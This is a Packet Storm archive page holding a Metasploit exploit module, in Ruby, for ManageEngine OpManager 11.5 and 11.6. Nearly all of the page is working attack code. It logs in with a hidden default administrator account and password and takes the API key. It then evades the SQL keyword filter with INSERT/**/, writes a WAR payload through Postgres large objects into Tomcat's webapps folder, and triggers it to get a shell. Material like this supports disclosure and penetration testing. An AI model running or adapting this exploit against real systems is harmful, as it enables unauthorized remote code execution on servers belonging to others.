Exploit the possiblities

ManageEngine OpManager Remote Code Execution

ManageEngine OpManager Remote Code Execution
Posted Sep 17, 2015
Authored by xistence | Site metasploit.com

This Metasploit module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which can not be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This Metasploit module has been tested successfully on OpManager v11.5 and v11.6 for Windows.

tags | exploit
systems | windows
MD5 | 7196d924d2204c71ab627c20517c13a1

ManageEngine OpManager Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
# It removes large object in database, shoudn't be a problem, but just in case....
Rank = ManualRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => 'ManageEngine OpManager Remote Code Execution',
'Description' => %q{
This module exploits a default credential vulnerability in ManageEngine OpManager, where a
default hidden account "IntegrationUser" with administrator privileges exists. The account
has a default password of "plugin" which can not be reset through the user interface. By
log-in and abusing the default administrator's SQL query functionality, it's possible to
write a WAR payload to disk and trigger an automatic deployment of this payload. This
module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
],
'References' =>
[
[ 'EDB', '38174' ],
],
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
'Targets' =>
[
['ManageEngine OpManager v11.6', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 14 2015',
'DefaultTarget' => 0))
end

def uri
target_uri.path
end

def check
# Check version
vprint_status("#{peer} - Trying to detect ManageEngine OpManager")

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'LoginPage.do')
})

unless res && res.code == 200
return Exploit::CheckCode::Safe
end

if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
version = $1
if Gem::Version.new(version) <= Gem::Version.new('11.6')
return Exploit::CheckCode::Appears
else
# Patch unknown
return Exploit::CheckCode::Detected
end
elsif res.body =~ /OpManager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end

def sql_query( key, query )
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
'vars_get' => { 'apiKey' => key },
'vars_post' => { 'query' => query }
})

unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")
end

res
end

def exploit
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'jsp', 'Login.do'),
'vars_post' => {
'domainName' => 'NULL',
'authType' => 'localUserLogin',
'userName' => 'IntegrationUser', # Hidden user
'password' => 'plugin' # Password of hidden user
}
})

if res && res.code == 302
redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "")
print_status("#{peer} - Location is [ #{redirect} ]")
else
fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
end


# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => redirect,
'method' => 'GET'
})

if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
api_key = $1
print_status("#{peer} - Retrieved API key [ #{api_key} ]")
else
fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
end

app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')

print_status("#{peer} - Executing SQL queries")

# Remove large object in database, just in case it exists from previous exploit attempts
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)

# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
sql = 'SELECT lo_create(-1)'
result = sql_query(api_key, sql)
if result.body =~ /lo_create":([0-9]+)}/
lo_id = $1
else
fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
end

# Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.
sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
sql_query(api_key, sql)

# Export our large object id data into a WAR file
sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"
sql_query(api_key, sql)

# Remove our large object in the database
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)

register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
register_file_for_cleanup("tomcat//webapps//#{app_base}")

10.times do
select(nil, nil, nil, 2)

# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end

end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    33 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close